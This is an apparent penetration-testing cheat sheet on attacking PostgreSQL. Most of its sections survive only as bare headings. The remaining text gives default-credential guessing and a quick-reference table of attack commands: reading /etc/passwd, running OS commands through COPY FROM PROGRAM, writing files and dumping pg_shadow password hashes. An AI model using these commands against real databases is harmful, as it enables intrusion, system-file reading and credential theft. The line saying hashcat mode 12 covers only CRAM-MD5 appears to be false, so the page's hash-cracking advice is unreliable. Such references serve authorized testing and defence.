Service Detection
Connect
Brute-Force
postgres / postgres or blank.
Enumeration
File Read
COPY
File Write
Command Execution
COPY … FROM PROGRAM (PostgreSQL 9.3+)
Large Object
Password Hashes
pg_shadow value is md5 + md5(password + username). Strip the md5 prefix and crack as raw MD5 with the username appended to each candidate (mode 12 is only for a captured CRAM-MD5 auth handshake, not this stored hash):
Extensions
RCE via Extension
If superuser:NSE Scripts
Quick Reference
| Check | Command |
|---|---|
| Connect | psql -h TARGET -U postgres |
| Read file | SELECT pg_read_file('/etc/passwd') |
| RCE | COPY cmd FROM PROGRAM 'id' |
| Write file | COPY (SELECT 'data') TO '/path/file' |
| Dump hashes | SELECT usename, passwd FROM pg_shadow |